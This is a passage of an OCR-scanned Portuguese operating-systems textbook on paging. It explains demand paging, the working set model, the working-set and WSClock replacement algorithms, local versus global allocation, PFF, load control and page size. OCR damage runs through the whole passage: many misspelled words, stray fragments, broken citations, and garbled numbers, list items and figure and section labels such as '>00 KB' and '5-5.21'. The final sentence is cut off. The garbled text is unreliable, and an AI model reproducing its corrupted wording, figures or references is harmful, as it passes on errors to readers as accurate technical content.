No modo rnais puro de paglnaęao, os procossos sao 
micializados sem qualqner de suas paginas presentes na 
memória. Assini que a CPU lenta buscar a primeira ins- 
iruęao, ela deiecta unia falta de pagina, fazendo o sistema 
operacional carregar na memória a referida pagina que 
comem essa primeira instruęao. Out ras faltas de pagina, 
para as variaveis globais e a pilha, geralmente ocorrem 
logo em seguida* O processo, depois de um certo tempo, 
tem a maioria das paginas de quc nccessita para ser exe- 
cutado com rdativamente poucas faltas dc pagina. Essa 
estrategia e denominada pagmaęao por demanda, pois 
as paginas só sao earregadas a medida que sao soliritadas, 
e nao antecipadarneme. 

Obviamenie, e facil escrever um programa de teste 
que kia sisiematicamciue lodas as paginas em um grandę 
cspaęo de cndereęamcnto c gcrc muitas faltas dc pagina, 
de mancira quc nao exista memória suHcientc para eon ter 
lodas das. Felizmeme, a maioria dos processos nao Funcio- 
na assim, Eles apresemam uma propriedade denominada 
localidade de referencja, a qual diz que, durante qual- 
quer uma das fases de sua exeaięao, o processo só vai refe- 
renciar uma fraęao relativamente peąuena de suas paginas. 
Por excmpIo, em cada passo de um compilador de multi- 
plos passos, somente uma fraęao de lodas as suas paginas e 
referenciada, e essa fraęao ć diferente a cada passo. 


O conjunto de paginas que um processo esta usan- 
do atualmenie e denominado conjunto de trabaiho 
(werkhtg set) (Denning, E96Sa; Denning, 1980)* Se todo 
esse conjunto estiver preseme na memória, o processo sera 
executado com poucas faltas de pagina ate mudar para ou- 
tra fasc de execuęao (por excmpIo, o próximo passo em um 
compilador). Sc a memória disponfvd for muito pcquena 
para conter todo esse conjunto dc trabaiho, o processo so- 
frera muitas faltas de pagina e sera executado lenta menie, 
pois a execuęao de urna instruęao Ieva apenas uns pou- 
cos nanossegundos, mas trazer uma pagina do disco para 
a memória consome, em geral, cerca de 10 milissegtmdos. 
ExecuLar apenas uma on duas instruęóes a cada 10 milis- 
segundos faria demorar uma eternidade para finalizar o 
processamento. Diz-se que um programa que gere faltas 
de pagina frequente e continua nieme provoca ultrapagi- 
naęao (thrashing) (Denning, I968b), 

Em um sistema mu lii programa do, os processos muitas 
vcz.es sao transferidos para disco, ou seja, lodas as suas pa- 
ginas sao retiradas da memória, para que outros processos 
possani utilizar a CPU, Uma questao que surge e: o que fa¬ 
zer quando as paginas rdalivas a um processo sao trazidas 
de voha a memória? Tecnicameme, nada precisa ser FeHo. 
O processo simplestnente causara faltas de pagina ate que 
sen conjunto de paginas tenha sido novamente carregadona 
memória. O problema e que, havendo 20, ceni ou mesmo 
mil faltas de pagina toda vez que um processo e carrega- 
do, □ execuęao se lorna basta me lenta e e desperdięado um 
consideravel tempo de CPU, pois o sistema operacional gasta 
aiguns milisscgundos de tempo de CPU para processar uma 
falta de pagina. 

Porianto, mu i t os sistemas de paginaęao te mam gerem 
ciar o conjunto de trabaiho de cada processo e assegurar 
que ele esteja preseme na memória antes de o processo 
ser execufado. Essa prariea, denominada modelo do con¬ 
junto de trabaiho {workin# set model) (Denning, 1970), 
foi concebida para reduzir substandalmentc a frcquencia 
de faltas de pagina. Carregar paginas de um processo na 
memória antes dc ele ser posto cm cxccuęao tambćm sc de- 
noinina pre-paginaęao. Notc que o conjtinto dc paginas 
se a llera no tempo, 

Nao e de hoje que se sabe que a maioria dos programas 
nao referenda seus espacos de endereęamento uniforme- 
mente, mas quc essas referencias tendem a se agrupar em 
um pequcno mi mero dc paginas. Uma referenda a memó¬ 
ria pode ocorrer para buscar uma instruęao, buscar dados 
ou armazenar dados. Em qualquer i usta nie de tempo, u 
existe um conjunto que e constitufdo de todas as paginas 
usadas pelas k referencias mais re cent es a memória. Esse 
conjunto, w{k, ł), como vimos anteriornieme, e o conjunto 
de trabaiho. Como as 1 referencias mais recentesdevem 
ter empregado todas as paginas usadas pelas k - 1 refe- 
rencias mais recentes — e possivelmente outras —, w{k r /) 
e urna funęao monotonicameme nao decrescente de k. O 





Sn#w 


limite de t), ąuando k tresce, e Unito, pois um progra- 
nia nao pode referendar mais paginas do que aquelas que 
seu espaęo de endereęamento contem e poncos programas 
iisam todas as paginas. A Figura 3.18 mostra o tamanho do 
conjunto de trabalho como funęao de 

0 Tato de a maioria dos programas acessar aleatoria- 
menie um peąueno nmnero de paginas e esse conjunto se 
alterar ientameme no tempo expltea a rapida subida iniciai 
da curva e, em seguida, o cresrimento lento para k maio- 
res. Por exemplo, um programa que estiver executando um 
lato que ocupe duas paginas de códtgo e accssando dados 
contidos cm ąuatro paginas podera referendar todas cssas 
scls paginas a cada mil instruędcs, mas sua referenda mais 
reccntc a alguma ouira pagina podera ter acontctido um 
milhao de mstruęóes alras, durattte a fasę de imdalizaęao. 
Em drtudc desse comportamemo assintótico, o conteiido 
do conjunto de uraballio nao e sensfvel ao valor escolhido de 
k, on seja, existe urna ampla faixa de va!ores de k para 
os quais o conjunto de trabalho nao se altera. Como o 
conjunto de trabalho varia em um ritmo lento, e possfvel 
saber com razoavei seguranęa quais paginas serao neces- 
sarias ąuando o programa puder continuar sua execuęno, 
dcsdc que sc conheęa o conjunto de trabalho do processo 
no instantc em quc a execuęao anterior fol interrompida. A 
pre-pagina ęao consistc no carregamento dessas paginas na 
memória antes de reinidalizar o processo. 

Para implementar o modelo do conjunto de trabalho, e 
necessario que o sistema opera clona! saiba ąuais sao as pa¬ 
ginas pcrtencentes ao conjunto de trabalho. A posse dessa 
informaęao tambem leva imediatamente a esse possfvcl al¬ 
go ritmo de subsliiuięao de pagina: ao ocorrcr urna falta dc 
pagina, cnconlre unia pagina nao pertencentc ao conjunto 
de trabalho e a remova da memória. Para implementar esse 
algoritmo, necesskamos de urna maneira precisa de deter- 
minar, a qualquer instame, quais paginas pertencem ao 
conjunto de trabalho e quais nao pertencem. Por definięao, 
o conjunto de trabalho e o conjunto das paginas usadas 
nas k mais recemes referencias a memória (alguns auto- 
res preferem as k mais recentes referencias a pagina, mas 
a escolha e arbitraria). Para implementar um algoritmo 
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com base no conjunto de trabalho, e preciso escolher an¬ 
tę ci pa da mente um valor para itr. Urna vez escolhido o va- 
lor de k, o conjunto de trabalho — ou seja, o conjunto de 
paginas referenciadas nas ultimas k referencias a memó¬ 
ria — e, após cada referenda a memória, determinado dc 
modo singular 

Obviamente, o lato de haver uma definięao operadonal 
do conjunto de trabalho nao signiftca que exista unia manei¬ 
ra efkiente de gerencia-lo em tempo real, ou seja, durante a 
execuęao do programa. Seria posswel pensar um registrador 
de deslocamento dc comprimento k, em quc cada referenda 
a memória dcslocasse csse registrador de uma posięao a cs- 
qucrda c inscrissc a dircita o numero da pagina rcfcrenciada 
mais rccenlemcntc. O conjunto dc todos os k mimeros dc 
paginas presentes nesse registrador dc deslocamento consli- 
tuiria o conjunto de trabalho. Na teoria, em uma falta dc pa¬ 
gina, o eonie tul o desse registrador de deslocamento esiaria 
apto a ser lido e ordenado. Paginas duplicadas poderiam, en- 
lao, ser removidas. O que sobrasse constiluiria o conjunto de 
trabalho. Gontu do, manter um registrador de deslocamento 
e processa-lo a cada falta de pagina tern um custo proibitivo, 
o que faz com que essa tecnica nunca seja usada. 

Em vez disso, empregam-se varias aproximaęóes, Uma 
delas, bastante comum, e a segumte: abandona-se a ideia 
da comagem de k referencias a memória e usa-se, em vez 
disso, o tempo de execuęao. Por exemplo, no lugar de de- 
finir que o conjunto de trabalho e constitufdo por aqueias 
paginas usadas nas ultimas dez milhoes de referencias a 
memória, podemos considerar que ele seja constituido da- 
quelas paginas referenciadas nos liltimos 100 ms do tempo 
dc cxccuęao. Na pratica, essa definięao e igualmcntc boa 
e, a leni disso, mais simples dc usar, Notę que, para cada 
processo, somentc seu próprio tempo de execuęao c con- 
siderado. Assńn, sc um processo inidalizar sua execuęao 
no instame Te ale o instantc 7 + 100 ms tiver uiilizado 40 
ms dc tempo de CPU, para os propósitos do conjunto de 
trabalho, o tempo eonsiderado para esse processo sera de 
40 ms. Etn geral, da-se o nonie de tempo virtual atual a 
essa quantidade de tempo de CPU que um processo real- 
mentc empregou desde que foi inidalizado. Usando essa 



I Figura 3.18 O conjunto de trabalho e o conjunto das paginas usadas pelas k referencias mais recentes a memória, A funęao w[k r f) 
ó o tamanho do conjunto de trabalho no instante f. 
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aproxin]aęao, o conjunto de trabalho de um processo pode 
ser visto como o conjumo de paginas que ele referenci o u 
d u ranie os ultimos t scgtmdos de tempo virtual 

Examinemos agora o algoritmo dc subslituięno de pa- 
gjna com base no conjunto de trabalho. A ideia principal c 
encomrar urna pagina que na o esteja presenle no conjunto 
de trabalho c remove-la da memória. Na Figura 3.19 vcmos 
parte de u ma tabela de paginas de u ma maquina, Como 
sornente paginas presentcs na memória sao consideradas 
candidatas a remoęao, paginas ausentes da memória sao 
ignoradas por csse algoritmo. Cada entrada contem (no mf- 
nimo) dois itens de informaęao; o mstantc aproximado em 
que a pagina lot referenda da pela ultima vez c o bit R (Re- 
ferenciada). O re tangu lo branco vazio representa campos 
nao necessSrios a esse algoritmo, como nu mero da mol- 
dura de pagina, os bits dc proteęao e o bit Af (Modificada). 

O algoritmo fund ona da segirinte maneira: suponha 
ąuc o hardware inidalize os bits R e Al de aeordo com 
nossa discussao amerior. Do mesmo modo, suponha que 
urna inierrupęao de relógio periódica ative a execuęao 
do software que limpe o bit Referenda da em cada tiqne 
de relógio. A cada faha de pagina, a tabela de paginas 
e varrida a procura dc urna pagina adeąuada para ser 
removida da memória. 

O bil R de cada entrada da tabela de paginas e exami- 
nado. Se o bit R for L o tempo virtual atual e eopiado no 
campo Imtantede ultimo uso na tabela de paginas, indicando 
que a pagina estava cm tiso no instame em quc ocorreu a 
falia de pagina. Como a pagina foi referenciada dura nie a 
imerrtipęao de relógio atual, cla esta certa menie presenle 
no conjunto dc trabalho e nao e urna candidala a ser remo- 
vida da memória (supoc-se quc o intervalo t corresponda 
a varias interrupęoes de relógio). 


Se R e 0, a pagina nao foi referenciada dura nie a inier- 
rupęao de relógio atual e pode ser candidala a remoęao da 
memória. Fara saberse ela deve ou nao ser removkk da me¬ 
mória, sua idade — o tempo virtua1 atual menos seu imtanie 
de ultimo uso dessa pagina — e computada e comparada com 
o intervalo r, Se a idade for maior do quc o intervalo r, 
faz muito tempo que essa pagina esta ausente do conjunto 
de trabalho. Ela e, entao, removida da memória c a nova 
pagina c carregada af, Da-se continuidade a atualizaęao das 
entradas restantes. 

Contudo, sc R e 0, mas a idade e menor ou igual ao 
intervalo t, a pagina ainda esta no conjunto de trabalho. A 
pagina e temporarianiente poupada; no eman to, a pagina 
com a maior idade (menor Imtantedo ultimo uso) e marca da. 
Se a tabela toda e varrida e nao se encontra nenluinia can- 
didata a remoęao, isso significa que tódas as paginas estao 
no conjumo de trabalho. Nesse caso, se unia ou mais pa¬ 
ginas corn R = 0 sao encontra das, aqucla com maior idade 
sera reinovida. Na piór das hipóteses, todas as paginas fo¬ 
ra m referenciadas durante a intcrrupęao de relógio atual 
(c, porlanto, todas tem R= I); assim, urna delas sera esco- 
Ih.ida aleatoriamente para remoęao, preferivdmente uma 
pagina nao referenciada (limpa), casocxista. 

_ 3.4.91 O algoritmo de substituięao de 

pagina WSCIock 

O algoritmo basico do conjunto de trabalho c en lado- 
nho, pois e preciso pesquisar em cada falta de pagina loda a 
tabela de paginas para que seja localizada urna pagina ade- 
quada para ser substituida* Ha um algoritmo melhorado, 
com base no algoritmo do relógio, quc tambeni lisa infor- 
maęoes do conjunto de trabalho: e o cha mado WSCIock 


2204 1 Tempo virlual atual 


Informaęao sobre 
uma pśgina 


Insłantedo 
ultimo uso 
Pagina referenciada 
desde a ultima 
interrupęao do relógio 


Pagina nao 
referenciada 
desde a ultima" 
interrupęao do 
relóg lo T abela d e pśg i n as 



Bit R (Referenciada) 


Varrer todas as pAginas examinando o bit R: 
se (R — 1) 

estabelecer Instante do ultimo uso para o tempo virtual atual. 

se (R = 0 e idade > t) 
removeresta pśgtna 

se (R — 0 e idade a t) 
lembrar o menor tempo 


I Figura 3.19 Algoritmo do conjunto de trabalho. 
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{Carr e Hennessey, 1981). Em virtude da simpliddade de 
implementaęao e do bom desempenho, esse algoritmo e 
amplamente utilizado. 

A estru tura de dados neccssaria e u ma lisia drcular de 
molduras de pagina (assim como no algoritmo do relogio), 
como mostra a Figura 3.20(a). InidaJmerHe, essa lisia cir- 
cular encontra-se vazia. Quam!o a primeira pagina e carre- 
gada, ela e inserida nessa lista. A medida que mais paginas 
sao carregadas na memória, elas tambem sao inseridas na 
lisia para formar um and. Gada entrada dessa lista contem 
o campo Imiante do ultimo uso , do algoritmo do conjumo 
de Irabalho basico, bem como o bil i? (mosirado) e o bil M 
{nao mestrado). 

Assim como ocorrc com o algoritmo do rclogio, a 
cada falta dc pagina, a pagina quc cstivcr sendo aponlada 
sera examinada prirndro. Se seu bit R for 1, a pagina foi 
rcfercnciada durantc a interrupęao dc relogio atual c, as¬ 
sim, nao sera candidata a remoęao da memória. O bit R e. 
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entao, colocado em zero, o pomeiro avanęa para a pagina 
seguimc e o algoritmo ć repelido para cssa nova pagina. 
O estado posterior a essa sequencia de eventos e mosirado 
na Figura 3.2Q(bj. 

Agora obsen/e o que acontece se a pagina que estivcr 
sendo aponlada liver seu bit R = 0, como i lustra a Figura 
3.20(c) + Se sua idade for maior do que o intervalo i e se 
essa pagina esiiver limpa, ela nao se enconirara no conjun- 
lo de trabaiho e havera urna cópia valida cm disco. A mol- 
dtira de pagina c simplesmcntc rdvindicada e a nova pa¬ 
gina e colocada la, conforme se verifica na Figura 3.20(d), 
Por ouiro lado, se a pagina estiver suja, ela nao podera ser 
reMndicada imediatameme, ja que nao ha uma cópia va- 
lida em disco. Para cviiar urn chaveamcnto dc processo, a 
escrita em disco e escalonada, mas o ponteiro e avanęado 
e o algoritmo continua com a próxima pagina. Afinal de 
contas, pode haver uma pagina vdha c limpa maisadiante, 
apta a ser usada imediatamente. 
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■ Figura 3.20 Funcionannenło do algoritmo WSGlock. (a) e (b) exemplificam o que acontece quando flsl,(c)e (d) exemplificam a 
situaę&o R = Q. 
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Hm princfpio, todas as paginas podem ser escalonadas 
para E/S em disco a cada volta do relógio. Para reduzir o 
trafego de disco, pode-sc estabelccer um limite, permitindo 
quc um numero maximo de n paginas sejam recscrrlas em 
disco. Urna vcz alcanęado esse limite, na o mais serao esca¬ 
lonadas novas escrhas em disco. 

O que acontece se o pomeiro deu uma volta completa 
retornando a sen porno de panida? Existem duas possibili- 
dades a serem consideradas: 

3. Pelo menos uma escrita foi cscalonada. 

2. Nenhnma escrita łoi cscalonada. 

No primeiro caso, o pomeiro simplesmente continua 
a se mover, procurando por uma pagina i i nipa, Visto qut 
uma on mais cscrilas em disco foram escalonadas. uma 
dessas escritas acabara por se completar H e sua pagina sera, 
etitao, marcada como limpa. A primeira pagina limpa en- 
coolrada e rcmovida> Essa pagina nao e neccssariamcniea 
primeira escrita cscalonada, pois o driver dc disco pode rc- 
ordenar as cscritas em disco para olimizar o desempenho. 

No segimdo caso, lodas as paginas pcrtencem ao eon- 
junto de trabalho; caso comrario, pelo menos uma escrita 
cm disco leria sido cscalonada. Em razao da fal ta dc infor- 
maęóes adicionais, a coisa mais simples a fazer c rehindi- 
car qualquer pagina limpa e usa-la. A localizaęao de uma 
pagina limpa pode ser registrada durante a varredura. Se 
nenhuma pagina limpa existir, entao a pagina aiual sera 
escolhida c reescrita cm disco. 

3.4.101 Resume dos algoritmos de 
subsfituięao de pagina 

Acabamos de analisar varios algoritmos de substituięao 
de pagina. Ncsta seęao, fareinos uma brevc revisao. A lisia de 
algoritmos discutidos c mostrada na Tabela 3.2. 


O algoritmo ótimo substitui, entre as paginas atuais, a 
pagina que serii referenciada por ultimo. Inlelizmente, nao 
ba como determinar qual pagina sera a ultima, de modo 
quc, na pratica, esse algoritmo nao pode ser usado. Emre- 
tanto, cle ć util como uma medida-padrao dc desempenho, 
a qual outros algoritmos pod cm ser comparados. 

O algoritmo NR U divide as paginas em quatro dasses, 
dependendo do esiado dos bits R e M. Uma pagina aleatória 
da dasse de ordem mais baixa e escolhida aleatória menie. 
Esse algoritmo e facii de implementar, mas ainda bastante 
mdi men tar. Existem outros melhores. 

O algoritmo FJFO gerencia a ordem em que as paginas 
foram carregadas na memória, mantendo-as em urna lista 
encadeada. A remoęao da pagina mais velha torna-se, as- 
rim, trivial, mas essa pagina ainda pode estar em uso, dc 
modo que o F1FO nao e uma escolha adequada. 

Uma modificaęao do FIFO e o algoritmo segunda chan- 
te, que vcriltca sea pagina esta cm uso a mes de remove-la. 
Se estiver, a pagina sera ponpada. Essa modificaęao melliora 
bastante o desempenho. O algoritmo do relógio e simples- 
mente uma implementaęao diferente do segunda chance: 
ele tern as mesmas propriedades de desempenho, mas gasła 
um pouco menos de tempo para executar o algoritmo. 

O LR U e um ex edenie algoritmo, mas nao pode ser 
impiementado sem hardware esperiaL Se o hardware nao 
esta disponivel ele nao pode ser usado. O NFU e uma 
ten ta li va rudimentar, nao muito boa, de aproximaęao do 
LRU. Por outro lado, o algoritmo do envelhecimento e uma 
aprojdmaęao muito melhor do LRU e pode ser implemen- 
tado e fi cierne men te, constituindo urna boa escolha. 

Os dois ultimos algoritmos utilizam o eon junto de tra- 
baiho, quc tem desempenho razoavd, mas e de implemen¬ 
tacjo um tanto cara, O WSClock e uma variante quc nao 
somenie prove um bom desempenho, mas lambem e eli¬ 
cie mc cni sua iniplerncniaęao. 


Algoritmo 

Comentario 

Ótimo 

Nao implementavel, mas util como um pacfrao de desempenho 

MRU (nao usada recentemente) 

Aprorimaęao rnuito rudimentar do LRU 

FFO [primeiro a entrar. primeiro a sair) 

Pode descartar paginas importantes 

Segunda chance 

Algoritmo FIFO bastante melhorado 

Reiógto 

Realista 

LRU (usada menos recentemente) 

Excelenłe algoritmo, porem dificil de ser impiementado de maneira exata 

NFU (nao frequentemente usada) 

Aproximaęao bastante rudimentar do LRU 

Envelhecimento (aging) 

Algoritmo efścienie que aproxima bem o LRU 

Conjunto de trabalho 

Implementacjo um tanto cara 

WSClock 

Algoritmo bom e eficiente 


I Ta be la 3.2 Al goritmos d e sub stit u ięao de pag i na discu ticJos no texto. 
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Entre todos eles, os dois melhores algoritmos sao o 
eiwdhecimento e o WSClock. Eles baseiam-se, respecii- 
yamente, no LRU e no conjunto de trabalho, Ambra ok¬ 
ręceni um bom desempenho de paginaęao e podem ser 
impleniemados de forma eflcieme. Ha poucos algoritmos 
alem dos citados aqui, mas esses dois sao provavelnieme os 
rnais importantes na pratica. 


3.5 


Questdes de projeto para 
sistemas de paginaęao 


Nas seęocs anteriores, explicamos como lun do na a pa¬ 
ginaęao, introduzimos os algoritmos baskos de subsiitui- 
ęao de pagina e mostramos como modela-los. No eman to, 
apenas conhecer a mecanica basica na o basta. Para projetar 
mn ststema de paginaęao e faze-to funcionar bem, e preci - 
so saber muito ntais. £ como a difereoęa entre saber como 
mover a tonę, o cavalo H o bispo e outras pcęas do xadrez 
e ser um bom joga do r, Nas seęocs a scguin analisaremos 
outras ąuestbes quc os projctistas de sistemas operacionais 
devem considerar cuidadosamente para obter um bom de¬ 
sempenho dc um ststema dc paginaęao. 


3-5.11 Politica de atocaęao local versus 
global 

Nas seęoes anteriores, discutimos varios algoritmos de 
escolha da pagina a ser substitinda quando da ocorrencia 
de urna laba de pagina. A maior questao assodada a essa 
escolha (cuja diseussao adiamos ate agora) ć a seguime: 
como a memória dcve ser alocada entre processos concor- 
remes em execuęao? 

De urna olhada na Figura 5,21 (a), Nela, tres processos — 
A, BeC—constituem o conjunto de processos execuiaveis. 
Suponha que A tenha urna falia de pagina. O algoriLmode 
substituięao de pagina deve lentar encontrar a pagina usada 


menos recentemente P !evando em coma somente as seis 
paginas atualmente alocadas para A f ou deve considerar to- 
das as paginas na memória? Se esse algoritmo considerar 
somente as paginas alocadas para A f a pagina com omenor 
valor dc idade sera A$, dc modo que obteremos a situaęao 
da Figura 3,2 l(b). 

Poroturo lado, se a pagina com o menor valor de idade 
for removida sem considerar a quem pertence, a pagina B3 
sera escolhrida c terem os erttao a situaęao da Figura 3,21 (c), 
O algoritmo da Figura 3,21 (b) e um algoritmo de substi- 
iuięao local, ao passo quc o algoritmo da Figura 3.21 (c) ć 
um algoritmo de substituięao global. Algoritmos dc substi¬ 
tuięao local alocam urna fraęao fixa de memória para ca da 
processo. Algoritmos de subsiiuilęao global alocam motdu- 
ras de pagina entre os processos em execuęao. Assim, o 
numero de molduras de pagina alocadas a cada processo 
varia no tempo, 

Ern geral, os algoritmos giobais funcionam melhor, es- 
pecialmcmc ąuando o tamanho do conjunto de irabalho 
varia duranie o tempo dc vida de um processo. Se um algo- 
ritmo local e usado e o conjunto de irabalho cresce duran¬ 
ie a execuęao do processo, oma u lira paginaęao (ihraskwg) 
pode Gcorrcr mesmo que existam muitas molduras dc pa¬ 
gina disponfyeis na memória. Se o conjunto de Irabalho 
diminuii durante a execuęao do processo, os algoritmos lo- 
cais desperdięam memória, Sc um algoritmo global c usa¬ 
do, o ststema deve decidir continua nieme ąuantas moldu¬ 
ras de pagina alocar para cada processo. Unia das mandras 
de fazer isso e o monitoramemo do tamanho do conjunto de 
irabalho desse processo, eon formę indicado pelos bits de en- 
velhecimemo (aging), mas essa estrategia nao necessaria- 
mente evita a ultrapaginaęao. O conjunto de trabalho pode 
variar de tamanho em ąuestao de mkrossegundos, enąuan- 
to os bits de envdhedmento repie sen tam urna medida rudi- 
mentar estendida a um numero de intcrrupęoes de rdógio. 
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Figura 3.21 Substituięao de pagina local yersus global. (a) Configuraęao originai. (b) Substituięao de pśgina local. (c) SubstituięSo 
I de pagina global. 
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Omra pratica se baseia em um algoritmo de alocaęao 
de molduras cle pagina para processos. U ma possibilidade 
e determinar periodicamente o nu mero de processos em 
execuęao e alocar para ca da processo o mesmo nu mero 
dc molduras dc pagina. Assim, com 12.416 molduras dc 
pagina dispomvds (isto ó, excliudas as do sisicma opera- 
cional) c dez processos, cada processo obtem 1.241 mol¬ 
duras de pagina. As scis molduras restantes vao para urna 
area comum (pod) para serem usadas na ocorrenda de 
falta de pagina. 

Embora esse metodo pareęa justo, nao tern muito 
sentido alocar a mes ma quamidadc de memória para um 
processo de 10 KB c para um dc 300 KB. Em vez disso, e 
possfvd alocar molduras dc pagina proporcionalmcnte ao 
lamanho tolal de cada processo — ou seja, um processo dc 
>00 KB obteria 30 vezes a ąuantidade alocada a um pro¬ 
cesso de 10 KB. Parece razoave) alocar para cada processo 
um nilmero mfnimo de molduras de pagina, de modo que 
ele possa ser executado, nao importando o quao pequeno 
seja. Por exemplo, em algumas ma q u i nas, urna unica ins- 
iruęao de dois operandos pode precisar de seis molduras 
dc pagina, pois a instmęao em si, o opera ndo-font e e o 
operando-destino podcm todos cxtrapolar os limites dc pa¬ 
gina. Com a alocaęao dc apenas ciii co molduras dc pagina, 
progranias quc coiitcnham cssas instruęocs nao poderao 
ser executados. 

Se um algoritmo global for usado, pode ser possfvel 
inidalizar cada processo com um nu mero de molduras de 
pagina proporcional a scu tamanho, mas a alocaęao tern 
dc ser atualizada dinamicamente durante a exccuęao do 
processo. Urna maneira dc gerenciar a alocaęao c usar o 
algoritmo PFF (pagefmltfreąumcy — freąuenda das faltas 
de pagina)* Esse algoritmo informa quando aumentar ou 
diminuir a alocaęao tle paginas de um processo, mas nada 
diz acerca de ąuais paginas substiimr ąuatido ocorrerem 
faltas de pagina* Ele semenie contro la o lamanho do con- 
junto de alocaęao. 

Para u ma da ssc extensa de aigoritmos de substituięao 
de pagina, incluindo o LRU, sabe-se que a freąuenda de 
faltas de pagina diminui a medida que mais molduras 
de pagina sao alocadas ao processo, eon formę discutimos 


anteriormeme* Essa e a suposięao por tras do PFF. Essa pio- 
priedade e ilustrada na Figura 3.22. 

Mcdir a freąuenda dc faltas dc pagina ć direto: basta oon- 
tar o nu mero de faltas por segundo e depois calcular a freąuen ¬ 
da media de faltas por segundo, Em seguida, para cada se- 
gttndo, somar a media exisieme — ou seja, a freąuenda 
de faltas de pagina amal — o nilmero de faltas ocorridas 
nesse novo segundo e, em seguida, c!ividir por dois, a firn de 
obter a nova media de faltas — ou seja, a nova freąuencia 
de faltas de pagina atual. A linha tracejada A corresponde a 
uma freąuenda de faltas de pagina inaceltavelmente alta, 
de modo que o processo quc gerou a faltas dc pagina deve 
rcccbcr mais molduras dc pagina para reduzir essa taxa. A 
linha tracejada B corresponde a uma freąuenda dc laltas 
de pagina tao baixa que permite tonduir qtic o processo 
dispbe de muita memória* Nesse caso, algumas molduras 
de pagina podem ser ret i rada s desse processo, Assim, o al¬ 
goritmo PFFtentara maniera freąuenda de paginaęao para 
cada processo em limites aceitaveis. 

E importantc notar quc alguns aigoritmos dc substitui¬ 
ęao de pagina podem fundonar tanto com uma politica dc 
substituięao local como uma global* Por exemplo, o F1FO 
pode substituir a pagina mais amiga em loda a memória 
(algoritmo global) ou a pagina mais antiga possufda pelo 
processo atual (algoritmo local). Da mesma maneira, o 
LRU — ou algum algoritmo aproximado — pode substituir 
a pagina menos osada recentemente em toda a memória 
(algoritmo global) ou a pagina menos u sad a recentemente 
possufda pelo processo atual (algoritmo local). A escolha 
de local versus global ć indcpcndcntc, em alguns casos, do 
algoritmo escolhido. 

Por omro lado, para os de mais aigoritmos de substi¬ 
tuięao de pagina, somente uma estrategia local tern sen¬ 
tido. Por exempIo, os aigoritmos conjunto de trabalho e 
WSClock referem-se a algum processo especffico e, portan- 
to, devem ser aplicados naąuele contexto. Para essesałgo- 
ritmos, nao cxistc um conjunto dc trabalho para a maąuina 
como um todo; a tentativa dc unir todos os conjuntos 
dc trabalho dos processos causaria a perda da propriedade da 
localidade e, conseąuentementc, esses aigoritmos nao 
funcionariam bem* 



Figura 3.22 Freąuencia de faltas de pagina como funę&o do numero de molduras de pagina alocadas. 
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5-5.21 Controle de earga 

Mcsmo com o melhor algoritmo dc substltuięao dc pa- 
gina c unia ótinia alocaęao giobal dc molduras dc pagina 
a processos, pode ocorrer ultrapaghiaęao {thmhing). Na 
verdade, sempre que os conjuritos de trabalho de lodos os 
processos comblnados cxcedem a capacidade da mcmória, 
pode-se esperar a ocorrencia de ultrapaginaęao. Urn sinto- 
ma dessa siiuaęao e que o algoritmo PFF indica que alguns 
processos precisam de mais memória, mas que nenhiim 
outro processo necessita de irtenos memória. Nesse caso, 
nao cxi$tc como alocar mais memória a processos quc dela 
precisam sem que, coni isso, se prejudiquem alguns outros 
processos, A linica soluęao possivel e iWrar-sc temporaria- 
mente de alguns dos processos. 

U m bom modo dc reduzir o nu mero dc processos que 
compclem por memória e levar alguns deles para disco e 
liberara memória a eles alocada. Por emnplo, urn proces¬ 
so pode ser Levado para disco e suas mol d u ras de pagina 
serem distribiudas emre outros processos que estao sof ren - 
do ultrapaginaęao. Se esta pa ran o sisicma pode continua r 
a execuęao du ramę um certo tempo. Se a uh rapa giną ęao 
nao aeabar, outro processo tera de ser levado para disco e 
assim por dianie, ate quc a ultrapagmaęao cesse. Assim, 
mcsmo com paginaęao, n troca de processos entre a memó¬ 
ria e o disco a ind a e necessaria. A diferenęa e que agora a 
troca de processos ć osada para reduzir a demanda pot en- 
dal por memória, cm vez dc rcivindicar paginas, 

A ideia de remover processos para disco a fim de ali- 
viara earga sobre a memória angina-se do es ca i on a niemo 
dc dois mveis, no qual alguns processos sao colocados cm 
disco e um escalotiador de curto prazo e empregado para 
escalonar os processos restantes na memória. Ć claro que as 
duas idcias podem ser combmadas, de modo que se remova 
somente um nu mero sufkiente de processos para disco, a 
firn de fazer com qtie a freąuencia de faltas dc pagina fique 
a ceitavel. Pcriodica menie, alguns processos sao trazidos do 
disco para a memória, e outros, presentes na memória, sao 
!evados para disco. 

Contudo, um outro fator a ser considcrado c o gran 
de muUiprogramaęao. Quando o mimero de processos pre¬ 
sentes na memória principal e muito peąueno, a CPU pode 
ficar ociosa duranie consideraveis perfodos de tempo. Ao 
escolher quais processos devem ser levados para disco, e 
predso considcrar nao só o tamanho dos processos c a 
taxa de paginaęao, mas tanibem outros aspectos, como se 
o processo ć do tipo limit a do pcla CPU ou por EfS c quais 
as caraclensticas que os processos rcmanescentes na mc- 
mória possuem. 

3.5.31 Tamanho de pagina 

O la mail ho de pagina e um para metro que frcquen Le¬ 
nienie pode ser escolhido pdo sistema operacionai, Mesrno 
se o hardware tiver sido projetado com, por esemplo, pagi- 
nas de 512 bytes, o sistema operacionai podera facilmeme 
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considcrar os pares de pagina 0 e 1, 2 e 3, 4 e 5 etc., como 
paginas de 1 KB, simplesmente alocando sempre duas pa- 
ginas consecutivas de 512 bytes. 

A determinaęao do md hor tamanho de pagina requer 
o balanceamento de varios fatores conflitantes, o que leva 
a nao se conseguir um tamanho ótimo geral Ha dois argu- 
mentosa favor de um tamanho pequeno de pagina, O pri- 
mciro e o scguinic: e provavd quc um segmento dc códi- 
go, dados ou pilha escolhido alcatoriamente nao ocupe um 
nu mero inteiro de paginas. Em media, meta de da ultima 
pagina permanecera vazia e, poiła oto, esse espaęo sera des- 
perdięado, Esse desperdtcio e den orni na do fragtnentaęao 
interna. Com n segmemos na memória c um tamanho de 
pagina de p bytes, np/2 bytes serao perdidos com a fragmen- 
taęao interna. Essa e unia razao para ler um tamanho de 
pagina peąueno. 

O segundo argument o a favor de um tamanho reduzi- 
do de pagina lica óbvio se pensarmos, por exemplo, em um 
programa que seja constitufdo de oito fases seąuenciais de 
4 KB cada. Se o tamanho de pagina for 32 KB, esse progra¬ 
ma demandara 32 KB duranie todo o tempo de execuęao. 
Se o tamanho de pagina for ló KB, ele requerera somente 
16 KB. Se o tamanho de pagina se mostrar igual ou infenor 
a 4 KB, esse programa requisitara somente 4 KB em um 
instante qualquer. Em geral, tamanhos grandes de pagina 
farao com que partes do programa nao usadas ocupeni a 
memória desneeessariamente. 

Por outro lado, paginas peąuenas implicam muitas pa¬ 
